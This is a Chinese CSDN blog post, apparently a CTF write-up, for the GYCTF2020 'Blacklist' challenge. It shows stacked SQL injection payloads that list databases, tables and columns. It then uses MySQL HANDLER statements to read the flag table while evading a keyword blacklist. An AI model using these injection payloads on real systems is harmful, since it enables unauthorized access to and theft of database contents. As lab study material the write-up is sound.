[GYCTF2020]Blacklis

最新推荐文章于 2024-07-29 22:40:28 发布
最新推荐文章于 2024-07-29 22:40:28 发布
阅读量166 收藏
点赞数
分类专栏: csa 文章标签: 数据库 mysql 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62706061/article/details/127326858
版权

[GYCTF2020]Blacklist

堆叠注入

在这里插入图片描述
在这里插入图片描述
输入了127.0.0.1 发现了恰如其名,黑名单过滤掉了一堆东西
在这里插入图片描述

根据之前做题的经验
想到了show 没被过滤
想到了堆叠注入
然而,请注意最后的;很重要。。!!!
大佬博客

1‘;show databases;

测试成功
在这里插入图片描述

1’;show tables;

在这里插入图片描述

1’;show columns from FlagHere;

在这里插入图片描述
接下来,如何去读取flag这个列中内容呢?

接下来的才是重点,在MYSQL数据库中:
可以用handler 【表名】 open来打开某个表
然后就可以在里面用handler 【表名】 read 【获取第几行】来获取该数据库里面的数据了
最后再利用handler【表名】 close来关闭


大佬博客 Hander的用法

构造payload:

1’;
handler FlagHere open;
handler FlagHere read first;
handler FlagHere close;

最后得到了flag
在这里插入图片描述
不close也行的哈。。

1’;
handler FlagHere open;
handler FlagHere read first;
handler FlagHere read next;
handler FlagHere read next;

在这里插入图片描述

蓝色的@猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dubbo 直连报Forbid consumer...Please check registry access list (whitelist/blacklis
k19421的博客
07-06 1197
最近在做项目的时候,因为要调试,所以选择了直连dubbo 按照官方文档给出的配置 配置为:   <dubbo:reference id="xxxService" interface="com.alibaba.xxx.XxxService" url="dubbo://localhost:20890" /> 但是使用的时候还是报错,堆栈信息如下:     com.ali...
解决:dubbo 调用异常Forbid consumer...Please check registry access list (whitelist/blacklis
春风化雨
12-27 3046
1、现象问题 1)dubbo服务启动正常 2)业务服务启动异常,提示调用dubbo拒绝 2、排查 1)dubbo服务接口注册至注册中心正常 2)服务启动调用失败 比对后发现问题: 1)dubbo服务的类路径已经发生变化,开发人员做了修改; 2)业务系统尚未引入变更后的新的jar包; 3)dubbo的xml配置文件中,配置的是历史类的路径 4)maven打包过程未报错,启动异常。...
linux multiple path test
aryoyo的博客
05-20 464
1.参考之前https://blog.csdn.net/aryoyo/article/details/80706354ISCSI配置,ISCSI initiator识别target不同ip但同一块disk [root@oc7067507274 send_targets]# iscsiadm -m node -T iqn.2018-06.com.redhat:yo1disk -p192.168.122.198 --login Logging in to [iface: default, targe...
keycloak 防爆力破解配置,取消锁定,以及修改提示顺序
bubaiyi的博客
06-17 382
keycloak 防爆力破解
decode语法,nvl
meng的博客
12-06 131
select ods_emp.* ,decode(job,'CL','办事员','manager','经理')from ods_emp;
hdu 5113 Black And White
AngelBeats!
06-04 445
Black And White Time Limit: 2000/2000 MS (Java/Others)    Memory Limit: 512000/512000 K (Java/Others) Total Submission(s): 1173    Accepted Submission(s): 306 Special Judge Problem Descr
ubuntu修改IP地址和网关的方法
Jchn lau
07-17 1108
一、使用命令设置Ubuntu IP地址 1.修改配置文件blacklist.conf禁用IPV6 sudo vi /etc/modprobe.d/blacklist.conf 表示用vi编辑器(也可以用其他编辑器,如gedit)编辑etc文件夹下modprobe.d文件夹中blacklist.conf文档的内容。 注意:只能在root用户模式下才可以修改 在文档最后添加 blacklis
spark2.2以后版本任务调度将增加黑名单机制
about云
11-20 1554
问题导读 1.spark如何开启黑名单机制? 2.哪些条件将将executors列入黑名单? 3.整个节点被列入黑名单,executors如何处理? spark2.2中在任务调度中,增加了黑名单机制,提高了资源分配的效率。不同条件分别会将executors和整个节点加入黑名单。但是加入黑名单,也是有时间限制的,我们可以自定义时间,超过了这个时间,将会被资源管理器回收。对于如
please check status of providers(disabled, not registered or in blacklist) dubbo服务报错
xiaochangIT的博客
07-24 235
org.apache.dubbo.rpc.RpcException: No provider available from registry please check status of providers(disabled, not registered or in blacklist). 这种情况在报错项目中找到启动日志文件。查看启动日志文件并查看那个服务报错。注释服务 再启动成功解决问题。
module blacklist
jason的笔记
07-09 4273
对内核模块来说,黑名单是指禁止某个模块装入的机制 使用 /etc/modprobe.d/ 中的文件 在 /etc/modprobe.d/ 中创建 .conf 文件,使用 blacklist 关键字屏蔽不需要的模块,例如如果不想装入 pcspkr 模块: /etc/modprobe.d/nobeep.conf # Do not load the pcspkr module on boot blac...
数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 310
数据库查询与操作指南-以Nebula图数据库为例
ODBC连接达梦数据库
qq_55187735的博客
07-24 296
用户执行,因为环境变量配置在。
SQL基础入门:解锁数据库管理的钥匙
WayneYalejk的博客
07-26 459
在数字化时代,数据已成为企业最宝贵的资产之一。为了高效地存储、查询和管理这些数据,SQL(Structured Query Language,结构化查询语言)应运而生。SQL不仅是数据库管理员的必备技能,也是数据分析师、开发人员等多个领域从业者的重要工具。本文将带您踏入SQL的世界,从基础概念到实际应用,一步步解锁数据库管理的钥匙。强调SQL在数据处理和分析中的重要性,鼓励读者通过实践不断深化对SQL的理解和应用。
已经10岁的K8S,在很多方面仍需努力
u012516914的专栏
07-28 244
/ K8S 已经 10 岁了,但仍然有许多方面要继续努力 /Kubernetes 于 2014 年 6 月推出,自那时起,它在推广云原生应用设计和支持更多微服务部署方面发挥了巨大作用。容器部署的增长非常迅速,而 Kubernetes 对于企业管理这些部署至关重要——根据 CNCF 上一份报告的调查结果,84% 的组织正在使用或评估 Kubernetes,而 66% 的潜在和实际消费者在生产中使用 ...
CTF-NSSCTF题单[GKCTF2020]
2302_78903258的博客
07-24 1266
在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。访问/eval的路由,会设置一个delay,和你传入的get参数的delay进行比较,取较大的那个,然后setTimeout是延时函数,delay秒后就会执行第一个参数,即next(),否则就会send出timeout。是假的,但是有线索,提示说真正的flag的在。
添加索引导致微服务异常
07-29 484
执行DDL时,最好使用ONLINE选项,随着oracle版本升级,online状态下可执行的DDL逐步增加,大部分普通DDL上,可以使用ONLINE选项,例如。而在新增索引的时候会有TM锁,而该表又有大量的insert、update等,因此会对这些dml语句造成阻塞。1、对大表新增索引尽量停业务,就算加上online不会造成阻塞,但对性能也有影响,特别是这种性能敏感的系统。2、在新增索引的时候加online参数,而online产生的TM锁时间比较短。加了online后,可以以非独占的方式创建和删除索引。
教务管理平台/高校教务管理系统的设计与实现/教务网站/学生成绩管理系统/学生课程管理系统
weixin_47958760的博客
07-27 785
本毕业设计的内容是设计并且实现一个基于JSP技术的教务管理平台。采用MYSQL数据库开发平台,SSM框架,Tomcat网络信息服务作为应用服务器。教务管理平台的功能已基本实现,主要有学生、教师、课程信息、课程选择、教师课表、学生成绩、图书信息、考试等管理功能。 论文主要从系统的分析与设计 、数据库设计和系统的详细设计等几个方面来进行论述,系统分析与设计部分主要论述了系统的功能分析、系统的设计思路,数据库设计主要论述了数据库的设计,系统的详细设计部分主要论述了几个主要模块的详细设计过程。
Springboot使用Dynamic-Datasource配置多数据源
最新发布
shenxiaomo1688的博客
07-29 732
grace-destroy: false #是否优雅关闭数据源,默认为false,设置为true时,关闭数据源时如果数据源中还存在活跃连接,至多等待10s后强制关闭。driver-class-name: com.mysql.jdbc.Driver # 3.2.0开始支持SPI可省略此配置。strict: false #严格匹配数据源,默认false. true未匹配到指定数据源时抛异常,false使用默认数据源。primary: master #设置默认的数据源或者数据源组,默认值即为master。
MySQL进阶之路 | 高级篇】简述Bin Log日志
2301_80912559的博客
07-27 868
binlog即binary log,二进制日志文件,也叫作变更日志(update log)。二进制日志可以通过数据库的全量备份和二进制日志中保存的增量信息,完成数据库的无损失恢复I但是,如果遇到数据量大、数据库和数据表很多(比如分库分表的应用)的场景,用二进制日志进行数据恢复,是很有挑战性的,因为起止位置不容易管理。在这种情况下,一个有效的解决办法是配置主从数据库服务器,甚至是一主多从的架构,把二进制日志文件的内容通过中继日志,同步到从数据库服务器中,这样就可以有效避免数据库故障导致的数据异常等问题。
使用abpcli创建项目时提示数据库迁移失败
qq_43893277的博客
07-28 167
使用abpcli创建项目时提示数据库迁移失败!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值